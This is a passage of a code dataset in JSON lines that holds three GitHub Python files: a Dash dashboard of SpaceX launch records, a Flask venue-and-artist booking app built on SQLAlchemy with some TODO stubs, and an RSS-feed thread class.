"usage_type": "call"}, {"api_name": "app.views.chunk", "line_number": 35, "usage_type": "attribute"}, {"api_name": "app.views", "line_number": 35, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 36, "usage_type": "call"}, {"api_name": "app.views.application", "line_number": 36, "usage_type": "attribute"}, {"api_name": "app.views", "line_number": 36, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 37, "usage_type": "call"}, {"api_name": "app.views.process", "line_number": 37, "usage_type": "attribute"}, {"api_name": "app.views", "line_number": 37, "usage_type": "name"}]}
+{"seq_id": "15590055034", "text": "# Import required libraries\nimport pandas as pd\nimport dash\nfrom dash import html\nfrom dash import dcc\nfrom dash.dependencies import Input, Output\nimport plotly.express as px\nimport plotly.io as pio\n\n# Set plot template\npio.templates.default = \"plotly_white\"\n\n# Read the airline data into pandas dataframe\nspacex_df = pd.read_csv(\"spacex_launch_dash.csv\")\nmax_payload = spacex_df['Payload Mass (kg)'].max()\nmin_payload = spacex_df['Payload Mass (kg)'].min()\nlaunch_sites = spacex_df.groupby(['Launch Site'],as_index=False)['Flight Number'].count()\n# Create a dash application\napp = dash.Dash(__name__)\n\n# Create an app layout\napp.layout = html.Div(style={'backgroundColor': '#F0F0F0'},\n children=[html.H1('SpaceX Launch Records Dashboard',\n style={'textAlign': 'center', 'color': '#503D36',\n 'font-size': 40,'background-color': 'rgb(255 255 255)'}),\n\n # TASK 1: Add a dropdown list to enable Launch Site selection\n # The default select value is for ALL sites\n dcc.Dropdown(id='site-dropdown',\n options = [\n {'label':'All Launch Sites', 'value':'All'},\n *[{'label': f'Launch Site : {i}', 'value': f'{i}'} for i in launch_sites['Launch Site']],\n ],\n value = 'All',\n placeholder='Enter Launch Site',\n searchable=True\n ),\n html.Br(style={'background-color': 'rgb(255 255 255)'}),\n\n # TASK 2: Add a pie chart to show the total successful launches count for all sites\n # If a specific launch site was selected, show the Success vs. Failed counts for the site\n html.Div(dcc.Graph(id='success-pie-chart'),style={'background-color': 'rgb(255 255 255)'}),\n html.Br(),\n\n html.P(\"Payload range (Kg):\",style={'textAlign': 'center','font-size': 20,'background-color': 'rgb(255 255 255)'}),\n # TASK 3: Add a slider to select payload range\n dcc.RangeSlider(id='payload-slider',\n min=0,max=10000,step=1000,\n marks={i:f'{i}' for i in range(0,10000,1000)},\n value=[min_payload,max_payload]),\n\n # TASK 4: Add a scatter chart to show the correlation between payload and launch success\n html.Div(dcc.Graph(id='success-payload-scatter-chart'),style={'background-color': 'rgb(255 255 255)'}),\n ])\n\n# TASK 2:\n# Add a callback function for `site-dropdown` as input, `success-pie-chart` as output\n@app.callback(Output(component_id = 'success-pie-chart',component_property = 'figure'),\n Input(component_id = 'site-dropdown',component_property = 'value'))\n \ndef get_pie_chart(entered_site):\n filtered_df = spacex_df.groupby(['Launch Site'],as_index=False)['class'].sum()\n if entered_site == 'All':\n fig = px.pie(\n filtered_df,\n values='class', \n names = 'Launch Site'\n )\n fig.update_layout(\n title={\n 'text': \"Successful Launches by Location\",\n 'y':.95,\n 'x':0.5,\n 'xanchor': 'center',\n 'yanchor': 'top'})\n return fig\n else:\n filtered_df = spacex_df.loc[spacex_df['Launch Site'] == entered_site]\n filtered_df = filtered_df.groupby(['class'],as_index=False)['Launch Site'].count()\n fig = px.pie(\n filtered_df,\n values='Launch Site', \n names = ['Failure','Success'], \n title = 'Total Succesful launches for ' + entered_site \n )\n fig.update_traces(textinfo='value')\n fig.update_layout(\n title={\n #'text': \"Successful Launches by Location\",\n 'y':.95,\n 'x':0.5,\n 'xanchor': 'center',\n 'yanchor': 'top'})\n return fig\n\n# TASK 4:\n# Add a callback function for `site-dropdown` and `payload-slider` as inputs, `success-payload-scatter-chart` as output\n@app.callback(Output(component_id = 'success-payload-scatter-chart',component_property = 'figure'),\n [Input(component_id = 'site-dropdown',component_property = 'value'),\n Input(component_id = 'payload-slider',component_property = 'value')])\n\ndef get_scatter_plot(site_name,payload):\n filtered_df = spacex_df.loc[(spacex_df['Payload Mass (kg)'] > payload[0]) & (spacex_df['Payload Mass (kg)'] < payload[1])]\n if site_name == 'All':\n fig1 = px.scatter(\n filtered_df,\n x='Payload Mass (kg)',\n y='class',\n color = 'Booster Version Category',\n size='Payload Mass (kg)'\n )\n return fig1\n else:\n site_payload = filtered_df.loc[filtered_df['Launch Site'] == site_name]\n fig1 = px.scatter(\n site_payload,\n x='Payload Mass (kg)',\n y='class',\n color = 'Booster Version Category',\n size='Payload Mass (kg)'\n )\n return fig1\n\n# Run the app\nif __name__ == '__main__':\n app.run_server(debug=True)\n", "repo_name": "IamDal/SpaceX-DataScience-IBM", "sub_path": "spacex_dash_app.py", "file_name": "spacex_dash_app.py", "file_ext": "py", "file_size_in_byte": 5816, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "plotly.io.templates", "line_number": 11, "usage_type": "attribute"}, {"api_name": "plotly.io", "line_number": 11, "usage_type": "name"}, {"api_name": "pandas.read_csv", "line_number": 14, "usage_type": "call"}, {"api_name": "dash.Dash", "line_number": 19, "usage_type": "call"}, {"api_name": "dash.html.Div", "line_number": 22, "usage_type": "call"}, {"api_name": "dash.html", "line_number": 22, "usage_type": "name"}, {"api_name": "dash.html.H1", "line_number": 23, "usage_type": "call"}, {"api_name": "dash.html", "line_number": 23, "usage_type": "name"}, {"api_name": "dash.dcc.Dropdown", "line_number": 29, "usage_type": "call"}, {"api_name": "dash.dcc", "line_number": 29, "usage_type": "name"}, {"api_name": "dash.html.Br", "line_number": 38, "usage_type": "call"}, {"api_name": "dash.html", "line_number": 38, "usage_type": "name"}, {"api_name": "dash.html.Div", "line_number": 42, "usage_type": "call"}, {"api_name": "dash.html", "line_number": 42, "usage_type": "name"}, {"api_name": "dash.dcc.Graph", "line_number": 42, "usage_type": "call"}, {"api_name": "dash.dcc", "line_number": 42, "usage_type": "name"}, {"api_name": "dash.html.Br", "line_number": 43, "usage_type": "call"}, {"api_name": "dash.html", "line_number": 43, "usage_type": "name"}, {"api_name": "dash.html.P", "line_number": 45, "usage_type": "call"}, {"api_name": "dash.html", "line_number": 45, "usage_type": "name"}, {"api_name": "dash.dcc.RangeSlider", "line_number": 47, "usage_type": "call"}, {"api_name": "dash.dcc", "line_number": 47, "usage_type": "name"}, {"api_name": "dash.html.Div", "line_number": 53, "usage_type": "call"}, {"api_name": "dash.html", "line_number": 53, "usage_type": "name"}, {"api_name": "dash.dcc.Graph", "line_number": 53, "usage_type": "call"}, {"api_name": "dash.dcc", "line_number": 53, "usage_type": "name"}, {"api_name": "plotly.express.pie", "line_number": 64, "usage_type": "call"}, {"api_name": "plotly.express", "line_number": 64, "usage_type": "name"}, {"api_name": "plotly.express.pie", "line_number": 80, "usage_type": "call"}, {"api_name": "plotly.express", "line_number": 80, "usage_type": "name"}, {"api_name": "dash.dependencies.Output", "line_number": 58, "usage_type": "call"}, {"api_name": "dash.dependencies.Input", "line_number": 59, "usage_type": "call"}, {"api_name": "plotly.express.scatter", "line_number": 105, "usage_type": "call"}, {"api_name": "plotly.express", "line_number": 105, "usage_type": "name"}, {"api_name": "plotly.express.scatter", "line_number": 115, "usage_type": "call"}, {"api_name": "plotly.express", "line_number": 115, "usage_type": "name"}, {"api_name": "dash.dependencies.Output", "line_number": 98, "usage_type": "call"}, {"api_name": "dash.dependencies.Input", "line_number": 99, "usage_type": "call"}, {"api_name": "dash.dependencies.Input", "line_number": 100, "usage_type": "call"}]}
+{"seq_id": "9252762045", "text": "#----------------------------------------------------------------------------#\n# Imports\n#----------------------------------------------------------------------------#\n\nimport json\nimport dateutil.parser\nimport babel\nfrom flask import Flask, render_template, request, Response, flash, redirect, url_for\nfrom flask_moment import Moment\nfrom flask_sqlalchemy import SQLAlchemy\nimport logging\nfrom logging import Formatter, FileHandler\nfrom flask_wtf import Form\nfrom flask_migrate import Migrate\nimport sys\nimport time\nfrom datetime import datetime\nfrom sqlalchemy.ext.declarative import declarative_base\nfrom forms import *\n\n\n#----------------------------------------------------------------------------#\n# App Config.\n#----------------------------------------------------------------------------#\n\napp = Flask(__name__)\nmoment = Moment(app)\napp.config.from_object('config')\ndb = SQLAlchemy(app)\nmigrate = Migrate(app, db)\n\n\n#----------------------------------------------------------------------------#\n# Models.\n#----------------------------------------------------------------------------#\n\n\nclass Venue(db.Model):\n __tablename__ = 'venue'\n\n id = db.Column(db.Integer, primary_key=True)\n name = db.Column(db.String())\n city = db.Column(db.String())\n state = db.Column(db.String())\n address = db.Column(db.String())\n phone = db.Column(db.String())\n genres = db.Column(db.ARRAY(db.String), nullable=False)\n image_link = db.Column(db.String(\n ), default=\"https://images.unsplash.com/photo-1543900694-133f37abaaa5?ixlib=rb-1.2.1&ixid=eyJhcHBfaWQiOjEyMDd9&auto=format&fit=crop&w=400&q=60\")\n facebook_link = db.Column(db.String())\n website = db.Column(db.String(), nullable=True,)\n seeking_talent = db.Column(db.Boolean, default=False, nullable=True)\n seeking_description = db.Column(\n db.String(), default='Not currently seeking for talents', nullable=True,)\n\n # 1 to Many relationship as the venue may have multiple shows,\n # that further will be distributed to upcoming and past shows\n venue_shows = db.relationship('Show', backref='venue-shows', lazy=True)\n\n # DONE:: implement any missing fields, as a database migration using Flask-Migrate\n\n\nclass Artist(db.Model):\n __tablename__ = 'artist'\n\n id = db.Column(db.Integer, primary_key=True)\n name = db.Column(db.String(), nullable=False)\n city = db.Column(db.String())\n state = db.Column(db.String())\n phone = db.Column(db.String())\n genres = db.Column(db.ARRAY(db.String), nullable=False)\n image_link = db.Column(db.String(),\n default=\"https://images.unsplash.com/photo-1543900694-133f37abaaa5?ixlib=rb-1.2.1&ixid=eyJhcHBfaWQiOjEyMDd9&auto=format&fit=crop&w=400&q=60\")\n facebook_link = db.Column(db.String())\n seeking_venue = db.Column(db.Boolean, default=True, nullable=True)\n seeking_description = db.Column(db.String(),\n default=\"Looking for shows to perform at any place in USA!\",\n nullable=True)\n website = db.Column(db.String(), nullable=True,)\n\n # 1 to Many relationship as the artist may have multiple shows,\n # that further will be distributed to upcoming and past shows\n artist_shows = db.relationship('Show', backref='artist-shows', lazy=True)\n\n # Done: implement any missing fields, as a database migration using Flask-Migrate\n\n# DONE: Implement Show and Artist models, and complete all model relationships and properties, as a database migration.\n\n\nclass Show(db.Model):\n __tablename__ = 'show'\n id = db.Column(db.Integer, primary_key=True)\n start_time = db.Column(db.DateTime, nullable=False)\n venue_id = db.Column(db.Integer, db.ForeignKey(\n 'venue.id'), nullable=False,)\n artist_id = db.Column(db.Integer, db.ForeignKey(\n 'artist.id'), nullable=False)\n#----------------------------------------------------------------------------#\n# Filters.\n#----------------------------------------------------------------------------#\n\n\ndef format_datetime(value, format='medium'):\n date = dateutil.parser.parse(value)\n if format == 'full':\n format = \"EEEE MMMM, d, y 'at' h:mma\"\n elif format == 'medium':\n format = \"EE MM, dd, y h:mma\"\n return babel.dates.format_datetime(date, format)\n\n\napp.jinja_env.filters['datetime'] = format_datetime\n\n#----------------------------------------------------------------------------#\n# Controllers.\n#----------------------------------------------------------------------------#\n\n\n@app.route('/')\ndef index():\n return render_template('pages/home.html')\n\n# SECTION HELPERS\n\n\ndef distribute_shows(venue_shows):\n upcoming_shows, past_shows = [], []\n for show_id in venue_shows:\n show_date = Show.query.filter_by(\n id=show_id.id).first().start_time\n show_date = (str(show_date).split())[0]\n show_date = time.mktime(\n datetime.strptime(show_date, \"%Y-%m-%d\").timetuple())\n if Show.query.filter_by(id=show_id.id).first().start_time > datetime.utcnow():\n upcoming_shows.append(show_id)\n else:\n past_shows.append(show_id)\n return upcoming_shows, past_shows\n\n\ndef format_artist_shows(shows):\n result = []\n for show in shows:\n temp = {}\n temp['venue_id'] = show.venue_id\n temp['start_time'] = format_datetime(str(show.start_time))\n venue = Venue.query.get(show.venue_id)\n temp['venue_name'] = venue.name\n temp['venue_image_link'] = venue.image_link\n result.append(temp)\n return result\n\n\ndef format_venue_shows(shows):\n result = []\n for show in shows:\n temp = {}\n temp['artist_id'] = show.artist_id\n selected_artist = Artist.query.get(show.artist_id)\n temp['artist_name'] = selected_artist.name\n temp['start_time'] = format_datetime(\n str(show.start_time))\n temp['artist_image_link'] = selected_artist.image_link\n result.append(temp)\n return result\n\n# SECTION Venues\n# ----------------------------------------------------------------\n\n\n@app.route('/venues')\ndef venues():\n received_venues = Venue.query.all()\n data = {}\n for venue in received_venues:\n upcoming_shows, past_shows = distribute_shows(venue.venue_shows)\n\n if venue.state not in data:\n data[venue.state] = {'city': venue.city, 'state': venue.state, 'venues': [{\n 'id': venue.id, 'name': venue.name, 'num_upcoming_shows': len(upcoming_shows)}]}\n else:\n data[venue.state]['venues'].append({\n 'id': venue.id, 'name': venue.name, 'num_upcoming_shows': len(upcoming_shows)\n })\n return render_template('pages/venues.html', areas=data.values())\n\n\n@app.route('/venues/search', methods=['POST'])\ndef search_venues():\n search_term = \"%{0}%\".format(request.form['search_term'])\n results = Venue.query.filter(Venue.name.ilike(search_term)).all()\n response = {\n \"count\": len(results),\n \"data\": [{\n \"id\": result.id,\n \"name\": result.name,\n }for result in results]\n }\n return render_template('pages/search_venues.html', results=response, search_term=request.form.get('search_term', ''))\n\n\n@app.route('/venues/')\ndef show_venue(venue_id):\n venue = Venue.query.get(venue_id)\n upcoming_shows, past_shows = distribute_shows(venue.venue_shows)\n upcoming_shows, past_shows = format_venue_shows(\n upcoming_shows), format_venue_shows(past_shows)\n\n data = {\n \"id\": venue.id,\n \"name\": venue.name,\n \"genres\": venue.genres,\n \"address\": venue.address,\n \"city\": venue.city,\n \"state\": venue.state,\n \"phone\": venue.phone,\n \"website\": venue.website,\n \"facebook_link\": venue.facebook_link,\n \"seeking_talent\": venue.seeking_talent,\n \"seeking_description\": venue.seeking_description,\n \"image_link\": venue.image_link,\n \"past_shows\": past_shows,\n \"upcoming_shows\": upcoming_shows,\n \"past_shows_count\": len(past_shows),\n \"upcoming_shows_count\": len(upcoming_shows),\n }\n return render_template('pages/show_venue.html', venue=data)\n\n# Create Venue\n# ----------------------------------------------------------------\n\n\n@app.route('/venues/create', methods=['GET'])\ndef create_venue_form():\n form = VenueForm()\n return render_template('forms/new_venue.html', form=form)\n\n\n@app.route('/venues/create', methods=['POST'])\ndef create_venue_submission():\n data = {}\n try:\n for key, value in request.form.items():\n if key == 'genres':\n continue\n elif key == 'seeking_talent':\n if value.lower() == 'yes':\n data['seeking_talent'] = True\n else:\n data['seeking_talent'] = False\n else:\n data[key] = value\n data['genres'] = request.form.getlist('genres')\n venue = Venue(name=data['name'],\n city=data['city'], state=data['state'],\n address=data['address'],\n phone=data['phone'],\n facebook_link=data['facebook_link'],\n image_link=data['image_link'],\n website=data['website'],\n seeking_talent=data['seeking_talent'],\n genres=data['genres'])\n db.session.add(venue)\n db.session.commit()\n flash('Venue ' + data['name'] + ' was successfully listed!')\n\n except:\n db.session.rollback()\n print(sys.exc_info())\n flash('An error occurred. Venue ' +\n data['name'] + ' could not be listed.')\n finally:\n db.session.close()\n return render_template('pages/home.html')\n\n\n@app.route('/venues/', methods=['DELETE'])\ndef delete_venue(venue_id):\n # TODO: Complete this endpoint for taking a venue_id, and using\n # SQLAlchemy ORM to delete a record. Handle cases where the session commit could fail.\n\n # BONUS CHALLENGE: Implement a button to delete a Venue on a Venue Page, have it so that\n # clicking that button delete it from the db then redirect the user to the homepage\n return None\n\n# Artists\n# ----------------------------------------------------------------\n@app.route('/artists')\ndef artists():\n artists = Artist.query.with_entities(Artist.id, Artist.name).all()\n\n data = [{'id': artist.id, 'name': artist.name} for artist in artists]\n return render_template('pages/artists.html', artists=data)\n\n\n@app.route('/artists/search', methods=['POST'])\ndef search_artists():\n search_term = \"%{0}%\".format(request.form['search_term'])\n results = Artist.query.filter(Artist.name.ilike(search_term)).all()\n response = {\n \"count\": len(results),\n \"data\": [{\n \"id\": result.id,\n \"name\": result.name,\n }for result in results]}\n\n return render_template('pages/search_artists.html', results=response, search_term=request.form.get('search_term', ''))\n\n\n@app.route('/artists/')\ndef show_artist(artist_id):\n artist = Artist.query.get(artist_id)\n upcoming_shows, past_shows = distribute_shows(artist.artist_shows)\n upcoming, past = format_artist_shows(\n upcoming_shows), format_artist_shows(past_shows)\n\n data = {\n \"id\": artist.id,\n \"name\": artist.name,\n \"genres\": artist.genres,\n \"city\": artist.city,\n \"state\": artist.state,\n \"phone\": artist.phone,\n \"website\": artist.website,\n \"facebook_link\": artist.facebook_link,\n \"seeking_venue\": artist.seeking_venue,\n \"seeking_description\": artist.seeking_description,\n \"image_link\": artist.image_link,\n \"past_shows\": past,\n \"upcoming_shows\": upcoming,\n \"past_shows_count\": len(past),\n \"upcoming_shows_count\": len(upcoming),\n }\n\n return render_template('pages/show_artist.html', artist=data)\n\n# Update\n# ----------------------------------------------------------------\n@app.route('/artists//edit', methods=['GET'])\ndef edit_artist(artist_id):\n form = ArtistForm()\n artist = {\n \"id\": 4,\n \"name\": \"Guns N Petals\",\n \"genres\": [\"Rock n Roll\"],\n \"city\": \"San Francisco\",\n \"state\": \"CA\",\n \"phone\": \"326-123-5000\",\n \"website\": \"https://www.gunsnpetalsband.com\",\n \"facebook_link\": \"https://www.facebook.com/GunsNPetals\",\n \"seeking_venue\": True,\n \"seeking_description\": \"Looking for shows to perform at in the San Francisco Bay Area!\",\n \"image_link\": \"https://images.unsplash.com/photo-1549213783-8284d0336c4f?ixlib=rb-1.2.1&ixid=eyJhcHBfaWQiOjEyMDd9&auto=format&fit=crop&w=300&q=80\"\n }\n # TODO: populate form with fields from artist with ID \n return render_template('forms/edit_artist.html', form=form, artist=artist)\n\n\n@app.route('/artists//edit', methods=['POST'])\ndef edit_artist_submission(artist_id):\n # TODO: take values from the form submitted, and update existing\n # artist record with ID using the new attributes\n\n return redirect(url_for('show_artist', artist_id=artist_id))\n\n\n@app.route('/venues//edit', methods=['GET'])\ndef edit_venue(venue_id):\n form = VenueForm()\n venue = {\n \"id\": 1,\n \"name\": \"The Musical Hop\",\n \"genres\": [\"Jazz\", \"Reggae\", \"Swing\", \"Classical\", \"Folk\"],\n \"address\": \"1015 Folsom Street\",\n \"city\": \"San Francisco\",\n \"state\": \"CA\",\n \"phone\": \"123-123-1234\",\n \"website\": \"https://www.themusicalhop.com\",\n \"facebook_link\": \"https://www.facebook.com/TheMusicalHop\",\n \"seeking_talent\": True,\n \"seeking_description\": \"We are on the lookout for a local artist to play every two weeks. Please call us.\",\n \"image_link\": \"https://images.unsplash.com/photo-1543900694-133f37abaaa5?ixlib=rb-1.2.1&ixid=eyJhcHBfaWQiOjEyMDd9&auto=format&fit=crop&w=400&q=60\"\n }\n # TODO: populate form with values from venue with ID \n return render_template('forms/edit_venue.html', form=form, venue=venue)\n\n\n@app.route('/venues//edit', methods=['POST'])\ndef edit_venue_submission(venue_id):\n # TODO: take values from the form submitted, and update existing\n # venue record with ID using the new attributes\n return redirect(url_for('show_venue', venue_id=venue_id))\n\n# Create Artist\n# ----------------------------------------------------------------\n\n\n@app.route('/artists/create', methods=['GET'])\ndef create_artist_form():\n form = ArtistForm()\n return render_template('forms/new_artist.html', form=form)\n\n\n@app.route('/artists/create', methods=['POST'])\ndef create_artist_submission():\n data = {}\n try:\n for key, value in request.form.items():\n if key == 'genres':\n continue\n elif key == 'seeking_venue':\n if value.lower() == 'yes':\n data['seeking_venue'] = True\n else:\n data['seeking_venue'] = False\n else:\n data[key] = value\n data['genres'] = request.form.getlist('genres')\n print('-'*80)\n print(data)\n print('-'*80)\n\n artist = Artist(name=data['name'],\n city=data['city'], state=data['state'],\n phone=data['phone'],\n facebook_link=data['facebook_link'],\n image_link=data['image_link'],\n website=data['website'],\n seeking_venue=data['seeking_venue'],\n genres=data['genres'], seeking_description=data['seeking_description'])\n db.session.add(artist)\n db.session.commit()\n flash('Artist ' + data['name'] + ' was successfully listed!')\n\n except:\n db.session.rollback()\n print(sys.exc_info())\n flash('An error occurred. Artist ' +\n data['name'] + ' could not be listed.')\n finally:\n db.session.close()\n return render_template('pages/home.html')\n\n\n# Shows\n# ----------------------------------------------------------------\n\n@app.route('/shows')\ndef shows():\n shows = Show.query.all()\n\n data = [{'venue_id': show.venue_id, 'artist_id': show.artist_id,\n 'start_time': format_datetime((str(show.start_time)))} for show in shows]\n for item in data:\n artist = Artist.query.get(item['artist_id'])\n item['artist_name'] = artist.name\n item['artist_image_link'] = artist.image_link\n item['venue_name'] = Venue.query.get(item['venue_id']).name\n return render_template('pages/shows.html', shows=data)\n\n\n@app.route('/shows/create')\ndef create_shows():\n # renders form. do not touch.\n form = ShowForm()\n return render_template('forms/new_show.html', form=form)\n\n\n@app.route('/shows/create', methods=['POST'])\ndef create_show_submission():\n body = request.form\n print(body)\n try:\n show = Show(start_time=body['start_time'],\n artist_id=body['artist_id'], venue_id=body['venue_id'])\n db.session.add(show)\n db.session.commit()\n flash('Show was successfully listed!')\n except:\n db.session.rollback()\n print(sys.exc_info())\n flash('Something went wrong please try again!')\n\n finally:\n db.session.close()\n\n return render_template('pages/home.html')\n\n\n@app.errorhandler(404)\ndef not_found_error(error):\n return render_template('errors/404.html'), 404\n\n\n@app.errorhandler(500)\ndef server_error(error):\n return render_template('errors/500.html'), 500\n\n\nif not app.debug:\n file_handler = FileHandler('error.log')\n file_handler.setFormatter(\n Formatter(\n '%(asctime)s %(levelname)s: %(message)s [in %(pathname)s:%(lineno)d]')\n )\n app.logger.setLevel(logging.INFO)\n file_handler.setLevel(logging.INFO)\n app.logger.addHandler(file_handler)\n app.logger.info('errors')\n\n#----------------------------------------------------------------------------#\n# Launch.\n#----------------------------------------------------------------------------#\n\n# Default port:\nif __name__ == '__main__':\n app.run()\n\n# Or specify port manually:\n'''\nif __name__ == '__main__':\n port = int(os.environ.get('PORT', 5000))\n app.run(host='0.0.0.0', port=port)\n'''\n", "repo_name": "3ba2ii/Fyyur", "sub_path": "starter_code/app.py", "file_name": "app.py", "file_ext": "py", "file_size_in_byte": 18455, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "flask.Flask", "line_number": 26, "usage_type": "call"}, {"api_name": "flask_moment.Moment", "line_number": 27, "usage_type": "call"}, {"api_name": "flask_sqlalchemy.SQLAlchemy", "line_number": 29, "usage_type": "call"}, {"api_name": "flask_migrate.Migrate", "line_number": 30, "usage_type": "call"}, {"api_name": "dateutil.parser.parser.parse", "line_number": 104, "usage_type": "call"}, {"api_name": "dateutil.parser.parser", "line_number": 104, "usage_type": "attribute"}, {"api_name": "dateutil.parser", "line_number": 104, "usage_type": "name"}, {"api_name": "babel.dates.format_datetime", "line_number": 109, "usage_type": "call"}, {"api_name": "babel.dates", "line_number": 109, "usage_type": "attribute"}, {"api_name": "flask.render_template", "line_number": 121, "usage_type": "call"}, {"api_name": "time.mktime", "line_number": 132, "usage_type": "call"}, {"api_name": "datetime.datetime.strptime", "line_number": 133, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 133, "usage_type": "name"}, {"api_name": "datetime.datetime.utcnow", "line_number": 134, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 134, "usage_type": "name"}, {"api_name": "flask.render_template", "line_number": 185, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 190, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 190, "usage_type": "name"}, {"api_name": "flask.render_template", "line_number": 199, "usage_type": "call"}, {"api_name": "flask.request.form.get", "line_number": 199, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 199, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 199, "usage_type": "name"}, {"api_name": "flask.render_template", "line_number": 227, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 236, "usage_type": "call"}, {"api_name": "flask.request.form.items", "line_number": 243, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 243, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 243, "usage_type": "name"}, {"api_name": "flask.request.form.getlist", "line_number": 253, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 253, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 253, "usage_type": "name"}, {"api_name": "flask.flash", "line_number": 265, "usage_type": "call"}, {"api_name": "sys.exc_info", "line_number": 269, "usage_type": "call"}, {"api_name": "flask.flash", "line_number": 270, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 274, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 293, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 298, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 298, "usage_type": "name"}, {"api_name": "flask.render_template", "line_number": 307, "usage_type": "call"}, {"api_name": "flask.request.form.get", "line_number": 307, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 307, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 307, "usage_type": "name"}, {"api_name": "flask.render_template", "line_number": 335, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 356, "usage_type": "call"}, {"api_name": "flask.redirect", "line_number": 364, "usage_type": "call"}, {"api_name": "flask.url_for", "line_number": 364, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 385, "usage_type": "call"}, {"api_name": "flask.redirect", "line_number": 392, "usage_type": "call"}, {"api_name": "flask.url_for", "line_number": 392, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 401, "usage_type": "call"}, {"api_name": "flask.request.form.items", "line_number": 408, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 408, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 408, "usage_type": "name"}, {"api_name": "flask.request.form.getlist", "line_number": 418, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 418, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 418, "usage_type": "name"}, {"api_name": "flask.flash", "line_number": 433, "usage_type": "call"}, {"api_name": "sys.exc_info", "line_number": 437, "usage_type": "call"}, {"api_name": "flask.flash", "line_number": 438, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 442, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 459, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 466, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 471, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 471, "usage_type": "name"}, {"api_name": "flask.flash", "line_number": 478, "usage_type": "call"}, {"api_name": "sys.exc_info", "line_number": 481, "usage_type": "call"}, {"api_name": "flask.flash", "line_number": 482, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 487, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 492, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 497, "usage_type": "call"}, {"api_name": "logging.FileHandler", "line_number": 501, "usage_type": "call"}, {"api_name": "logging.Formatter", "line_number": 503, "usage_type": "call"}, {"api_name": "logging.INFO", "line_number": 506, "usage_type": "attribute"}, {"api_name": "logging.INFO", "line_number": 507, "usage_type": "attribute"}]}
+{"seq_id": "23163074844", "text": "\"\"\"Describe a thread working on a RSS url.\"\"\"\n\nfrom pathlib import Path\nimport threading\n\n\nfrom src.smbc import from_smbc\nfrom src.youtube import FromYoutube\nfrom src.utilities import hash_text\nfrom src.utilities import WarningContext\n\n\nclass RssThread(threading.Thread):\n \"\"\"The thread dealing with a RSS url.\"\"\"\n\n def __init__(self, url):\n \"\"\"Initialize.\"\"\"\n threading.Thread.__init__(self)\n self.url = url\n self.finished = False\n self.log_file = Path('.').resolve() \\\n / \"logs\" \\\n / f\"{hash_text(self.url)}.log\"\n print(f\"Will write in the log file {self.log_file}\")\n\n def check(self):\n \"\"\"Check if self is alive and restart if needed.\"\"\"\n with WarningContext(f\"Check thread {self.url}\"):\n print(f\"url: {self.url}\")\n print(f\"alive: {self.is_alive()}\")\n print(f\"finished: {self.finished}\")\n if self.is_alive():\n return True\n if self.finished:\n return True\n print(f\"I'm going to restart.\")\n return False\n\n def rss_write(self, text):\n \"\"\"Catch the print of the current thread.\"\"\"\n with open(self.log_file, 'a') as logfile:\n logfile.write(text)\n\n def flush(self):\n \"\"\"Implement the flush.\"\"\"\n\n def run(self):\n \"\"\"Make the work.\"\"\"\n if \"youtube.com\" in self.url:\n FromYoutube(self.url, self).start()\n if \"smbc\" in self.url:\n from_smbc(self.url)\n", "repo_name": "LaurentClaessens/hermione", "sub_path": "src/rss_thread.py", "file_name": "rss_thread.py", "file_ext": "py", "file_size_in_byte": 1520, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "threading.Thread", "line_number": 13, "usage_type": "attribute"}, {"api_name": "threading.Thread.__init__", "line_number": 18, "usage_type": "call"}, {"api_name": "threading.Thread", "line_number": 18, "usage_type": "attribute"}, {"api_name": "pathlib.Path", "line_number": 21, "usage_type": "call"}, {"api_name": "src.utilities.hash_text", "line_number": 23, "usage_type": "call"}, {"api_name": "src.utilities.WarningContext", "line_number": 28, "usage_type": "call"}, {"api_name": "src.youtube.FromYoutube", "line_number": 50, "usage_type": "call"}, {"api_name": "src.smbc.from_smbc", "line_number": 52, "usage_type": "call"}]}
